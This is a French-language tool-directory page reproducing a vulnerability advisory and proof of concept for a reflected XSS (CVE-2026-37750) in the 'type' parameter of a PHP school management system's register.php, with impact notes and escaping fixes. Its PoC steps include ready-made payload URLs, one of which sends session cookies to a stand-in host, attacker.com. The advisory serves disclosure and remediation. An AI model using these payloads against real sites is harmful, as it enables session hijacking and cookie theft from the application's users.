Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-37750 — Réflexion XSS (Cross-Site Scripting) preuve de concept pour School Management System 1.0, démontrant l'exécution de JavaScript non authentifiée via le paramètre type dans register.php, avec analyse d'impact et recommandations de remédiation. | Kitploit
Outils/GitHubGitHub/menevarad007/cve-2026-37750
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebApprentissage et Éducation
GitHubmenevarad007/cve-2026-37750

CVE-2026-37750

Réflexion XSS (Cross-Site Scripting) preuve de concept pour School Management System 1.0, démontrant l'exécution de JavaScript non authentifiée via le paramètre type dans register.php, avec analyse d'impact et recommandations de remédiation.

Voir le dépôt
il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-37750 — School Management System 1.0 - XSS réfléchi

Détails

ChampInformations
ID CVECVE-2026-37750
TypeCross-Site Scripting (XSS) réfléchi
SévéritéMoyenne (CVSSv3 : 6.1)
Vendeurmahmoudai1
ProduitSchool Management System
Version1.0
DécouvreurVarad AP Mene
Date2026-04-16
CWECWE-79

Description

Une vulnérabilité de Cross-Site Scripting (XSS) réfléchi dans School Management System 1.0 de mahmoudai1 permet à des attaquants distants non authentifiés d'exécuter du JavaScript arbitraire dans les navigateurs des victimes via le paramètre type non assaini dans register.php. Le paramètre est réfléchi sans échappement à l'intérieur d'une balise h1 à la ligne 22 et à l'intérieur d'un attribut action de formulaire à la ligne 26. Aucune authentification n'est requise pour exploiter cette vulnérabilité.

ID CVE : CVE-2026-37750 CWE : CWE-79 CVSSv3 : 6.1 Moyenne (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)


Description du produit

School Management System 1.0 est une application web PHP/MySQL de mahmoudai1 sur GitHub utilisée pour gérer les étudiants, les enseignants et les parents dans les écoles.

URL du vendeur : https://github.com/mahmoudai1/school-management-system


Fichier vulnérable

register.php — Formulaire d'inscription (aucune authentification requise)


Code vulnérable

Ligne 22 : echo ucfirst($_REQUEST['type'])

Ligne 26 : echo $_REQUEST['type']

Aucun htmlspecialchars() utilisé — l'entrée utilisateur brute est réfléchie directement dans le HTML.


Preuve de concept

Prérequis :

  • Aucune authentification requise
  • La cible doit exécuter School Management System 1.0

Étape 1 — Ouvrir le navigateur et visiter cette URL : http://target/register.php?type=script-alert-document.cookie-/script

Étape 2 — Le JavaScript s'exécute dans le navigateur Résultat : une boîte d'alerte s'affiche montrant les cookies de session.

Étape 3 — Charge utile de vol de cookies : http://target/register.php?type=script-document.location-http://attacker.com/steal?c=-document.cookie-/script Étape 4 — Charge utile d'injection dans l'attribut action du formulaire : http://target/register.php?type="-script-alert(1)-/script

Deux points d'injection confirmés :

Point d'injection 1 — À l'intérieur de la balise h1 (ligne 22) :

root@kitploit:~
echo ucfirst($_REQUEST['type'])

Sortie :

root@kitploit:~
<h1><script>alert(1)</script> Application</h1>

Point d'injection 2 — À l'intérieur de l'attribut action du formulaire (ligne 26) :

root@kitploit:~
echo $_REQUEST['type']

Sortie :

root@kitploit:~
<form action="register.php?type=<script>alert(1)</script>">

Impact

  • Détournement de session via le vol de cookies
  • Hameçonnage — injection de faux formulaires de connexion
  • Distribution de logiciels malveillants via des redirections
  • Aucune authentification requise

Correction

Correctif ligne 22 : echo htmlspecialchars(ucfirst($_REQUEST['type']), ENT_QUOTES, 'UTF-8');

Correctif ligne 26 : echo htmlspecialchars($_REQUEST['type'], ENT_QUOTES, 'UTF-8');


Références

  • https://github.com/mahmoudai1/school-management-system
  • https://github.com/mahmoudai1/school-management-system/blob/main/register.php

Découvreur

Varad AP Mene E-mail : [email protected] GitHub : https://github.com/menevarad007

Télécharger l’outil